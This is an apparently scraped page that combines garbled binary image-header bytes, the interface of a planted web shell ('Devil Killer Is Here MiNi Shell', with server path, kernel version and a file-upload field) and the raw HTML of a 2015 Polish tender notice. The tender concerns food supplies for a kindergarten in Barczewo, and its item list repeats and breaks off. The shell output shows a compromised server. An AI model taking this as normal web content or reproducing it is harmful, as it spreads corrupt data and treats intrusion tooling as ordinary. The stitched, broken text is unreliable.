JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151203/328882-N-2015.html

<p class="kh_header"><b>Barczewo: ZAKUP DOSTAWA I ROZŁADUNEK ARTYKUŁÓW SPOŻYWCZYCH NA POTRZEBY PRZEDSZKOLA MIEJSKIEGO W BARCZEWIE</b><br>
<b>Numer ogłoszenia: 328882 - 2015; data zamieszczenia: 03.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Miejskie w Barczewie , ul. Słowackiego 7, 11-010 Barczewo, woj. warmińsko-mazurskie, tel. 89 5148396, faks 89 5148396.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP DOSTAWA I ROZŁADUNEK ARTYKUŁÓW SPOŻYWCZYCH NA POTRZEBY PRZEDSZKOLA MIEJSKIEGO W BARCZEWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje 6 części PM 271.2.2015
CZĘŚĆ 1. Zakup, dostawa i rozładunek artykułów żywnościowych dla Przedszkola Miejskiego               w Barczewie
Artykuły ogólnospożywcze  CPV : 15.60.00.00-4;15.80.00.00.-6;15.82.00.00.-2;15.83.00.00-5;15.84.00.00-8;15.85.00.00.-1;  15.86.00-4;15.87.00.00-7;15.89.00.00-3;15.98.00.00-1;15.40.00.00.-2;15.33.00.00-0;03.14.25.00-3;
Lp. 	Nazwa asortymentu  	Jednostka miary	Ilość
1	Jaja kurze z chowu wolnowybiegowego klasa L	Szt	5000
2.	Makaron dwujajeczny różne kształty w oryginalnych opakowaniach od400do500g  pszenica zwyczajna	kg	150
3.	Makaron drobny gwiazdki,muszelkiop.250-500g	Kg	45
4.	Płatki owsiane op 500g	Kg	45
5	Makaron wieloziarnisty spaghetti (brązowy)	Kg	80
6	Płatki jęczmienne op500g	Kg	45
7.	Kasza manna 1000g	Kg	45
8.	Kasza kukurydziana op.250-500g	Kg	45
9.	Kasza jaglana op.400-500g	Kg	45
10.	Kasza  jęczmienna średnia op.400-500g	Kg	80
11.	Kasza gryczana prażona op.400-1000g	Kg	105
12.	Kasza pęczak op.400-500g	Kg	10
13	Mąka typ 2000	kg	50
14.	Mąka pszenna typ 550 op.1000g	Kg	350
15.	Mąka ziemniaczana op.500-1000g	Kg	60
16.	Płatki ryżowe op.250-500g	Kg	45
17.	Ryż biały długoziarnisty op.500g-1000g	Kg	90
18.	Ryż naturalny (brązowy) op.400g-1000g	Kg	125
19.	Cukier biały kryształ,pakowany op.1000g	Kg	500
20.	Dżem niskosłodzony różne smaki op.co najmniej370g	Szt	320
21.	Koncentrat pomidorowy 30% op.co najmniej 190g	Szt	550
22.	Sól kuchenna jodowana biała,drobna op.1000g	Kg	40
23.	Sól morska drobna.o niskiej zawartości sodu bez antyzbrylacza	Kg	80
24.	Kawa zbożowa rozpuszczalna składzboża72%(Jęczmień,żyto),cykoria,burak cukrowy-prażone.Op 150g	Szt	80
25.	Kakao prawdziwe op.100-200g	kg	10
26.	Budyń w proszku różne smaki op.waga co najmniej 40g bez cukru	Szt	500
27	Kisiel owocowy w proszku bez cukru różne smaki waga co najmniej 40g	Szt	500
28.	Olej z pierwszego tłoczenia rzepakowy op.900-1000g	L	120
29.	Olej słonecznikowy op.900-1000g	L	50
30.	Makaron pełnoziarnisty różne kształty op.500g (brązowy)	Kg	150
31.	Herbata owocowa,saszetki,pakowanaop.co najmniej 25 szt50g szt	Szt	220
32.	Herbata miętowa saszetki ,pakowana op.co najmniej20szt	Szt	25
33.	Herbata granulowanaop.100g	Szt	250
34.	Sok pomarańczowy naturalny 100%  zawartość cukru do 10g w 100ml gotowego produktu op.1000ml	L	300
35.	Biszkopty op.250-500g	Kg	130
36.	Sok pomidorowy naturalny 100% op.1000ml( zawartość soli,sodu w 100g gotowego produktu max.10g-12g)	L	200
37.	Keczup pomidorowy,łagodny  w opakowaniach szklanych op.	Szt	200
38.	Pieprz mielony prawdziwy bez dodatków w oryginalnych op.co najmniej 15g	Szt	150
39.	Pieprz ziołowy w oryginalnych opakowaniach	Szt	90
40.	Ziele angielskie w oryginalnych opakowaniach op.co najmniej14g	Szt	40
41.	Liść laurowy w oryginalnych opakowaniach	Szt	40
42.	Majonez słoik op.850g Skład: co najmniej 83% oleju rzepakowego.	szt	18
43.	Ogórek konserwowy w oryginalnych opakowaniach 0,9l słoik	Szt	40
44.	Kukurydza konserwowa puszka op.400g	Szt	40
45.	Szczaw krojony w oryginalnych opakowaniach waga co najmniej330g	szt	25
46.	Chrzan tarty słoik op.co najmniej170gz kwaskiem cytrynowym	Szt	25
47.	Groszek konserwowy w puszce w oryginalnych op.400g	Szt	30
48.	Papryka mielona słodka w oryginalnych op.16g	Szt	80
49.	Przyprawa Curry op.20g	Szt	30
50.	Przyprawa Kurkuma  op.10-20g	Szt	30
51.	Majeranek otarty waga co najmniej 6g	szt	80
52.	Wafle suche prostokątne waga co najmniej 146g	Szt	180
53.	Sól himalajska	kg	20
54.	Zioła prowansalskie w oryginalnych opakowaniach op.10g	szt	50
55.	Cukier waniliowy	szt	80
56.	Kwasek cytrynowyop.20g	Szt	65
57.	Musztarda słoik op.co najmniej 180g	szt	50
58.	Miód naturalny wielokwiatowy op.370g	Szt	300
59.	Ananas plastry puszka waga bez odcieku co najmniej 565g	szt	30
60.	Proszek do pieczenia	Szt 	10
61.	Syrop owocowy naturalny op.420 ml	L	100
62.	Bazylia suszona przyprawa	szt	40
63	Makrela w sosie pomidorowym bez warzyw op co najmniej 200g zawierające co najmniej 60% mięsa z ryb w 100g produktu gotowego do spożycia.	Szt	100
64.	Soki owocowo-warzywne naturalne 100% op.1000ml(np marchew,jabłko; marchew-banan)	L	300
65.	Cukier puder op.co najmniej 500g	Kg	10
66.	Tymianek suszony waga co najmniej10g	Szt	30
67.	Oregano suszone waga co najmniej 10g	Szt	30
68	Fasola czerwona w puszce waga co najmniej 400g	szt	120
69	Olej z pierwszego tłoczenia rzepakowy z dodatkami(czosnek,bazylia,pomidory)op.co najmniej0,25l	L	25
70	Soczewica czerwona połówki op.500-1000g	kg	30
71	Pomidory w puszce bez skórki( z otwieraczem) op.co najmniej 400g	szt	400
72	Kawa zbożowa sypana op.co najmniej 200g	szt	30
73	Ciecierzyca op.500-1000g	kg	20
74	Drożdże świeże	kg	5
75	Płatki jaglane błyskawiczne op.250-500g	kg	15
76	Brzoskwinie w puszce	szt	20
77	Gałka muszkatołowa mielona	szt	30
78	Kolendra suszona przyprawa	Szt
	20
79	Lubczyk suszony przyprawa	szt	20
80	Rozmaryn suszony przyprawa	szt	20
81	Cynamon mielony przyprawa	szt	20
82	Goździki przyprawa	szt	20
83	Sok owocowy jabłkowy naturalny 100% (zawartość cukru w 100g gotowego produktu max10g ) op.1000ml	L	200
			
84	Imbir mielony przyprawa	szt	20
			

CZĘŚĆ 2. Zakup, dostawa i rozładunek  mięsa i jego przetworów dla Przedszkola Miejskiego w Barczewie                                        CPV: 15.10.00.00-9;15.11.21.00-7
Nazwa asortymentu  

Lp. 	Nazwa asortymentu	Jednostka miary	Ilość
1.	Karkówka surowa wieprzowa bez kości	Kg	220
2.	Łopatka wieprzowa surowa bez kości	Kg	600
3.	Wołowina surowa ligawa	Kg	170
4.	Szynka wieprzowa surowa bez kości,bez skóry	Kg	220
5.	Filet z indyka surowy	Kg	200
6.	Filet z kurczaka surowy	Kg	400
7.	Schab bez kości surowy wieprzowy	Kg	100
8.	Udka bez grzbietu z kurczaka surowe	Kg	250
9.	Antrykot wołowy surowy	Kg	20
10.	Żebra wołowe surowe	Kg	20
11.	Porcje rosołowe z kurczaka	Kg	30
12.	Wątróbka drobiowa surowa	Kg	15
13.	Parówki wp. cienkie o zwartości co najmniej71% mięsa wp.	Kg	45
14.	Łopatka wp. Pieczona skład:łopatka wp min.73%,woda,sól,naturalne przyprawy.	Kg	30
15.	Szynka wiejska o wyczuwalnym smaku i zapachu użytych przypraw,mięso wp.min.75%,sól,przyprawy naturalne,woda	kg	60
16.	Kiełbasa krakowska sucha .Wyrób w osłonce białkowej.Składniki:mięso wp.(100g produktu otrzymano z 112g mięsa wp.)Wyczuwalny smak i zapach użytych przypraw naturalnych.	kg	30
17.	Kiełbasa krakowska parzona baton.Kiełbasa gruboziarnista,wędzona i parzona.Mięso wp.min 63%,sól,woda,przyprawy naturalne wyczuwalne w smaku.	Kg	60
18.	Polędwica sopocka wp. klasa I .Mięso wp.(schab b/k) min.90%,woda,sól,przyprawy naturalne.	Kg	60
19.	Szynka wp.gotowana.kl.I.Mięso wieprzowe min 80%.woda,sól,przyprawy naturalne.	Kg	60
20.	Kiełbasa cienka wp.podsuszana o zawartości mięsa min.72%.	kg	80
21.	Filet wędzony z indyka o zawartości mięsa z indyka min 80%,woda ,sól,przyprawy naturalne wyczuwalne w smaku i zapachu.	Kg	80
22.	Ogonówka wędzona parzona.Mięso wp.min82%,woda,sól,przyprawy naturalne.	Kg	30
23	Smalec wp. kostka 200-250g	Kg	30
24	Kiełbasa szynkowa wp.baton,mięso wp min 71%,sól,woda,przyprawy naturalne.	kg	30



CZĘŚĆ 3. Zakup, dostawa i rozładunek ziemniaków,warzyw,jarzyn,owoców, owoców tropikalnych,orzechów.
CPV:  03.20.00.00-3; 0,.22.00.00-9;03.22.21.10-7	180
Lp. 	Nazwa asortymentu  	Jednostka miary	Ilość
1.	Ziemniaki 	kg	5000
2.	Marchew świeża korzeń	kg	450
3.	Pietruszka świeża korzeń	kg	150
4.	Cebula biała	kg	100
5.	Cebula czerwona	kg	60
6.	Seler świeży korzeń	kg	300
7.	Por świeży	kg	220
8.	Kapusta czerwona świeża	kg	150
9.	Pieczarki świeże 	kg	40
10.	Czosnek kraj pochodzenie polska głowka 	szt	100
11.	Szczypior świeży pęczek	szt	750
12.	Rzodkiewka pęczek	szt	750
13.	Rzodkiew biała świeża	Kg	60
14	Sałata lodowa ,pakowana główka	szt	240
15	Sałata  zielona świeża główka	Szt	270
16	Pomidory czerwone, świeże	kg	700
17	Ogórek św.szklarniowy	kg	350
18	Ogórek swieży,zielony gruntowy	kg	100
19	Ogórek kwaszony	Kg	30
20	Kapusta kwaszona biała	kg	95
21	Kapusta pekinska 	kg	100
22	Kapusta biała słodka  główka	kg	150
23	Papryka czerwona ,żółta,zielona	kg	120
24	Cytryna świeża	Kg	100
25	Jabłka świeże	kg	2500
26	Banany świeże	kg	900
27	Gruszki świeże	kg	300
28	kiwi	Kg	60
29	Mandarynki  świeże	kg	300
30	Winogrona zielone bezpestkowe	kg	180
31	Śliwka fioletowa duża	kg	60
32	Brzoskwinie	kg	40
33	Winogrona granatowe	kg	60
34	Koper zielony,świeży pęczek 100g	Szt	600
35	Natka pietruszki świeza pęczek  100g	szt	600
36	Burak czerwony świeży	Kg	280
37	Rodzynki op.co najmniej 100g-150g	kg	5
38	Orzechy włoskie łuskane op.co najmniej100g	kg	5
39	Fasola sucha średnia  op.400-1000g	Kg	25
40	Groch połówki op. 400-1000g	kg	25
41	Pietruszka suszona natka op.50-100g	kg	4
42	Włoszczyzna suszona op.100-200g	kg	4
43	Koper zielony suszony op 50-100g	kg	3
44	Pestki słonecznika op.50-150g	kg	8
45	Żurawina suszona op.250-500g	kg	8
46	Kalafior świeży w sezonie	szt	80
47	Brokuły świeze (w sezonie)	szt	80
48	Kapusta młoda( w sezonie)	kg	40
49	Młode ziemniaki(w sezonie)	kg	200
50	Truskawka św w sezonie	kg	120
51	Botwinka (w sezonie)	pęcz	80
52	Morele suszone	kg	5
53	Figi suszone	kg	5
	Cebulka suszona			3
54		kg	
55	Cukinia	kg	30
			
			





 
CZĘŚĆ 4. Zakup, dostawa i rozładunek  mrożonek dla Przedszkola Miejskiego w Barczewie(ryby przetworzone,warzywa i owoce mrożone) PCV 15.20.00.00-0;15.33.11.70-9,15.89.60.00-5;15.89.43.00-4)                                    
Lp. 	Nazwa asortymentu  	Jednostka miary	Ilość
1	Włoszczyzna4-składnikowa(marchew,por,seler,pietruszka)op.2000-2500g)	kg	800
2.	Mieszanka 7-składnikowa z kapustą brukselką op. 2000-2500g	kg	180
3.	Brokuły mrożone 450g-2500g	kg	400
4.	Kalafior mrożony op.450-2500g	kg	400
5	Fasolka szparagowa żółta cięta op.450-2500g	kg	150
6	Fasolka szparagowa zielona cieta op.450-2500g	kg	100
7	Szpinak mrożony mielony.op.450-2500g	Kg	80
8 	Groszek zielony mrożony op.450-2500g	kg	180
9	Barszcz ukraiński skład:burak (ćwikłowy,kapusta,fasola,marchew,pomidor,seler,cebula)op.450-2500g	kg	60
10	Mieszanka kompotowa 5-składnikowa z truskawką op.450-2500g 	Kg	400
11	Mieszanka kompotowa 5-składnikowa(ananas,porzeczka czerwona,porzeczka czarna,rabarbar,truskawka) lub równoważna	kg	500
12	Truskawka mrożona op.450-2500g	Kg	250
13	Bukiet warzyw (brokuł,kalafior,marchew)op.450-2500g	Kg	230
14	Bukiet warzyw (kalafior,fasola szparagowa,marchew,brukselka,groch zielony)lub równoważna op.450-2500g	kg	150
15	Marchew kostka op.450-2500g	kg	340
16	Marchew z groszkiem op.450-2500g	Kg	250
17	Wiśnia b)p op.450-2500g	Kg	100
18	Porzeczka czarna mrożona op.450-2500g	kg	80
19	Dorsz filet SHP	kg	250
20	Miruna filet SHP	kg	180
21	Morszczuk filet SHP	kg	250
22	Dynia mrożona	kg	30
23	Makrela wędzona	Kg	50
24	Włoszczyzna 3-składnikowa paski op.450-2500g	Kg	130
25	Ryba sola filet mrożona	kg	30
26	Kluski śląske op 400-2500g	kg	90
27	Mieszanka kompotowa z owoców leśnych op2000-2500g	kg	400
28	Dorada filet	kg	60

CZĘŚĆ 5. Zakup, dostawa i rozładunek produktów mleczarskich do Przedszkola Miejskiego w Barczewie PCV 15.50.00.00-3

Lp. 	Nazwa asortymentu  	Jednostka miary	Ilość
1.	Mleko folia 2%op.1000ml	L	3740
2.	Mleko folia 3,2%	L	3740
3.	Mleko UHT op.1000ml 2%	L	300
4.	Mleko UHT op.1000ml 3,2%	L	300
5.	Masło ekstra zawierajace co najmniej 82% tłuszczu	kg	400
6.	Jogurt owocowy typu greckiego,waga op.125g o niskiej zawartości cukru,bez aromatów i barwników,bez syropu glukozowo-fruktozowego,zawartośc soli wynika wyłącznie z nauralnie występującego sodu.	szt	1200
7.	Serek homogenizowany wanilia op.co najmniej 135g	szt	360
8.	 Jogurt naturalny typu greckiego lub bałkańskiego  op.co najmniej 350g  zawierający nie więcej niż 0,12g sodu/soli w 100g gotowego do spożycia produktu	L	550
9.	Kefir  naturalny op.co najmniej350g zawierający nie więcej  niż  0,12g sodu/soli w 100g gotowego do spożycia produktu	L	 300
10.	Śmietana 12% op.co najmniej 400ml	L	200
11	Ser żółty  typu salami  (nie dopuszcza się produktu seropodobnego)	kg	45
12	Ser żółty typu gouda (nie dopuszcza się produktu seropodobnego)	kg	45
13	Śmietana 9% op 400g	L	200
14	Maślanka naturalna1000ml	L	60
15	Twaróg krajanka półtłusty	kg	500
16	Serek ziarnisty wiejski naturalny op.150-200g	szt	300
17	Jogurt naturalny 2% tłuszczu op.150g	Szt 	900

CZĘŚĆ 6. Zakup, dostawa i rozładunek pieczywa dla Przedszkola Miejskiego w Barczewie PCV :15.81.00.00-9
Lp. 	Nazwa asortymentu  	Jednostka miary	Ilość
1.	Chleb pszenno- żytni krojony foliowany waga co najmniej400-500g	Szt.	900
2	Chleb żytni pełnoziarnisty krojony foliowany waga co najmniej  400g	szt	550
3	Bułki kajzerki waga co najmniej 50g	szt	1000
4	Bułka grahamka waga co najmniej 50 g	szt	2000
5	Chleb wieloziarnisty zawartość minimum 3-ziarna(siemię lniane,słonecznik obowiązkowo,pozostałe dowolne) waga co najmniej 400-500g	szt	500
6	Ciasto drożdżowe z niską zawartością cukru	kg	150
7	Chałka zdobna co najmniej 300g	szt	220
8	Chleb razowy waga min.400g krojony,foliowany	szt	750
9	Rogaliki krucho -drożdżowe nadziewane(z niska zawartością cukru)	kg	150
10	Bułki  z ziarnami dyni waga co najmniej 50g	szt	800
11	Bułki czerstwe  waga co najmniej waga 50g	szt	900
12	Bułka tarta	kg	80
13	Bułka z ziarnami  różnymi waga min.50g	szt	600
14	Chleb wiejski waga min.400g	szt	300
15	Rogale z makiem waga co najmniej 50g	szt	1000.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.30.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 03.01.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przedszkolebarczewo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Miejskie w Barczewie ul.Słowackiego7 11-010 Barczewo pokój 104 w godz 8:00-13:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2015 godzina 11:00, miejsce: Przedszkole Miejskie w Barczewie ul.Słowackiego7 pokój 104.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ 1. Zakup, dostawa i rozładunek artykułów żywnościowych dla Przedszkola Miejskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jaja kurze z chowu wolnowybiegowego klasa L	Szt	5000
2.	Makaron dwujajeczny różne kształty w oryginalnych opakowaniach od400do500g  pszenica zwyczajna	kg	150
3.	Makaron drobny gwiazdki,muszelkiop.250-500g	Kg	45
4.	Płatki owsiane op 500g	Kg	45
5	Makaron wieloziarnisty spaghetti (brązowy)	Kg	80
6	Płatki jęczmienne op500g	Kg	45
7.	Kasza manna 1000g	Kg	45
8.	Kasza kukurydziana op.250-500g	Kg	45
9.	Kasza jaglana op.400-500g	Kg	45
10.	Kasza  jęczmienna średnia op.400-500g	Kg	80
11.	Kasza gryczana prażona op.400-1000g	Kg	105
12.	Kasza pęczak op.400-500g	Kg	10
13	Mąka typ 2000	kg	50
14.	Mąka pszenna typ 550 op.1000g	Kg	350
15.	Mąka ziemniaczana op.500-1000g	Kg	60
16.	Płatki ryżowe op.250-500g	Kg	45
17.	Ryż biały długoziarnisty op.500g-1000g	Kg	90
18.	Ryż naturalny (brązowy) op.400g-1000g	Kg	125
19.	Cukier biały kryształ,pakowany op.1000g	Kg	500
20.	Dżem niskosłodzony różne smaki op.co najmniej370g	Szt	320
21.	Koncentrat pomidorowy 30% op.co najmniej 190g	Szt	550
22.	Sól kuchenna jodowana biała,drobna op.1000g	Kg	40
23.	Sól morska drobna.o niskiej zawartości sodu bez antyzbrylacza	Kg	80
24.	Kawa zbożowa rozpuszczalna składzboża72%(Jęczmień,żyto),cykoria,burak cukrowy-prażone.Op 150g	Szt	80
25.	Kakao prawdziwe op.100-200g	kg	10
26.	Budyń w proszku różne smaki op.waga co najmniej 40g bez cukru	Szt	500
27	Kisiel owocowy w proszku bez cukru różne smaki waga co najmniej 40g	Szt	500
28.	Olej z pierwszego tłoczenia rzepakowy op.900-1000g	L	120
29.	Olej słonecznikowy op.900-1000g	L	50
30.	Makaron pełnoziarnisty różne kształty op.500g (brązowy)	Kg	150
31.	Herbata owocowa,saszetki,pakowanaop.co najmniej 25x50g szt	Szt	220
32.	Herbata miętowa saszetki ,pakowana op.co najmniej20szt	Szt	25
33.	Herbata granulowanaop.100g	Szt	250
34.	Sok pomarańczowy naturalny 100%  zawartość cukru do 10g w 100ml gotowego produktu op.1000ml	L	300
35.	Biszkopty op.250-500g	Kg	130
36.	Sok pomidorowy naturalny 100% op.1000ml( zawartość soli,sodu w 100g gotowego produktu max.10g-12g)	L	200
37.	Keczup pomidorowy,łagodny  w opakowaniach szklanych op.	Szt	200
38.	Pieprz mielony prawdziwy bez dodatków w oryginalnych op.co najmniej 15g	Szt	150
39.	Pieprz ziołowy w oryginalnych opakowaniach	Szt	90
40.	Ziele angielskie w oryginalnych opakowaniach op.co najmniej14g	Szt	40
41.	Liść laurowy w oryginalnych opakowaniach	Szt	40
